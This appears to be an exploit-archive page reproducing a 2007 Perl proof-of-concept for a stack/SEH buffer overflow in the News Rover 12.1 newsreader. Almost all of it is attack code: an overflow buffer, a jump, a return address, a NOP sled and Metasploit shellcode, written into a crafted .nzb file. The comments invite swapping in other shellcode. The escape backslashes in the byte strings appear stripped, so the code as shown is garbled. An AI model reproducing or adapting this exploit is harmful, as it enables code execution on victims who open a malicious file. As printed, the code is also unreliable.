[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
# Published : 2007-02-24
# Author : Umesh Wanve
# Previous Title : Infecting Elf Binaries to Gain Local Root Exploit
# Next Title : News Bin Pro 5.33 (.NBI File) Local Buffer Overflow Exploit
#!/usr/bin/perl
# ===============================================================================================
# News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit
# By Umesh Wanve (umesh_345@yahoo.com)
# ==============================================================================================
# Credits : Originally discovered and coded in c by Marsu <MarsupilamiPowa@hotmail.fr>
#
# Reference : http://www.securityfocus.com/bid/22618
#
# Date : 24-02-2007
#
# This is converted into perl for perl lovers.
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing more than 2022 bytes we can able to overwrite SEH handler
# So here you go.
# Buffer = Buffer + Short Jmp to Hellcode (Pointer to NEXT SEH Handler) + SEH HANDLER + NOP SLED + Shellcode
# <-2022 Bytes -> <---------------4 Byte-------------------------------> < 4 Byte > + <-15 bytes->
#
# USE 0x750211a9 Universal address found on Metasploit. Thanks to them
# Just change to anything you want.
#
# This was written as a fun. Use it at your own risk.
#
# Special thanks to Marsu (bug discover and exploit coded in c by him). :)
# Also thanks to Metasploit for there great Opcode database.
#
#================================================================================================
use strict;
my($buffer)=("A" x 2022); #buffer upto SEH structure
my($Short_jmp)="xebx15x90x90"; #short jmp to hellcode
my($SEH_handler)="xa9x11x02x75"; #pop, pop, ret in WS2HELP.DLL in WIN 2000 SP4
# Universal Address :)
#Change according to your need
my($nop)="x90x90x90x90x90".
"x90x90x90x90x90".
"x90x90x90x90x90"; #NOP sled to land into hellcode
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my($hell_calc)=
"x2bxc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa4".
"xb2x82x70x83xebxfcxe2xf4x58x5axc6x70xa4xb2x09x35".
"x98x39xfex75xdcxb3x6dxfbxebxaax09x2fx84xb3x69x39".
"x2fx86x09x71x4ax83x42xe9x08x36x42x04xa3x73x48x7d".
"xa5x70x69x84x9fxe6xa6x74xd1x57x09x2fx80xb3x69x16".
"x2fxbexc9xfbxfbxaex83x9bx2fxaex09x71x4fx3bxdex54".
"xa0x71xb3xb0xc0x39xc2x40x21x72xfax7cx2fxf2x8exfb".
"xd4xaex2fxfbxccxbax69x79x2fx32x32x70xa4xb2x09x18".
"x98xedxb3x86xc4xe4x0bx88x27x72xf9x20xccx42x08x74".
"xfbxdax1ax8ex2exbcxd5x8fx43xd1xe3x1cxc7x9cxe7x08".
"xc1xb2x82x70";
my($file_header)="<?xml version="1.0" encoding="iso-8859-1" ?>n".
"<!DOCTYPE nzb PUBLIC "-//newzBin//DTD NZB 1.0//EN" "http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd">n".
"<!-- NZB Generated by Umesh Wanve -->n".
"<nzb xmlns="http://www.google.com">nn";
my($file_end)="</segment>n".
"</segments>n".
"</file>n".
"</nzb>n";
open(OUTPUTFILE, ">poc.nzb"); # Crafted .NZB file
print OUTPUTFILE $file_header; # Writing Header
print OUTPUTFILE "<file poster="Poster" date="1170609233"nsubject=""; # Vulnerable SUBJECT parameter
print OUTPUTFILE $buffer; # buffer =A x 2022
print OUTPUTFILE $Short_jmp; #short jump xEBx15x90x90
print OUTPUTFILE $SEH_handler; #pop pop ret in WS2HELP.DLL in WIN 2000 SP4
print OUTPUTFILE $nop; #nop sled to jump into shellcode
print OUTPUTFILE $hell_calc; #the hell code
print OUTPUTFILE "">n<groups><group>some group</group></groups>n<segments>n<segment bytes="30" number="1">some name";
print OUTPUTFILE $file_end; # End of file
close(OUTFILE);
# ==========================================
# www.Syue.com [2007-02-24]